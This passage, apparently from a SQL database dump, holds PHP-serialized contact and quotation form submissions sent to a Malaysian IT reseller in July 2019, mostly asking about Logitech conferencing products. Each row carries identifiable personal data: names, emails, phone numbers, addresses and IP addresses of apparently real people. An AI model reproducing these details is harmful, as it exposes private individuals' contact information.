digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-22 09:54:03','14.192.210.3','1'),(239,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Noor Azmi Bahaldin\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"noorazmi.bahaldin@mmhe.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03 22753855\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"MMHE Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Level 31, Menara Dayabumi, Jalan Sultan Hishamuddin, 50500 KL\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:65:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Kindly propose model for (20pax / 10pax / 3pax) ..TQ\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"11\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-22 11:12:53','203.121.96.226','1'),(240,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Mikhail Lim\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"mikhail.lim@theedgelearning.com.sg\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123611079\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"The Edge Learning Centre\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:74:\"Looking for devices that is suitable for conference call for small office.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"67\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-22 16:30:27','210.187.148.125','1'),(241,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"jeff\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"silicon_nilai@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0189807362\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"SILICON IT SOLUTION\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Logitech Brio\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-22 17:22:54','42.188.65.219','1'),(242,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Siti Shazwani\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"shazwani@lgm.gov.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0392062127\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Lembaga Getah Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech BCC950\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:77:\"Please send a quotation for 1 unit of the selected product including warranty\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"33\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-23 09:45:32','110.159.241.191','1'),(243,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Eric Wong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"eric.wong@hengdeligroup.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"03-2300 1818\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Hengdeli Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Logitech Connect\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"Any charge on delivery to Kuala Lumpur?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"00\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-23 11:30:22','14.192.246.45','1'),(244,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Steven Yee\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"sales2@mastech-engineering.comp\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60395432543\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Mastech Engineering\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:79:\"I need module type monitor stand with arm. I wish to show my photo in whatssap.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-24 09:42:34','113.210.49.33','1'),(245,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Shamsolnizam\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"shamsol@hadid.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192335529\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Hadid Engineering m sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Melawati corporate centre\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Logitech Group, Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:53:\"We are looking video conference system using internet\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 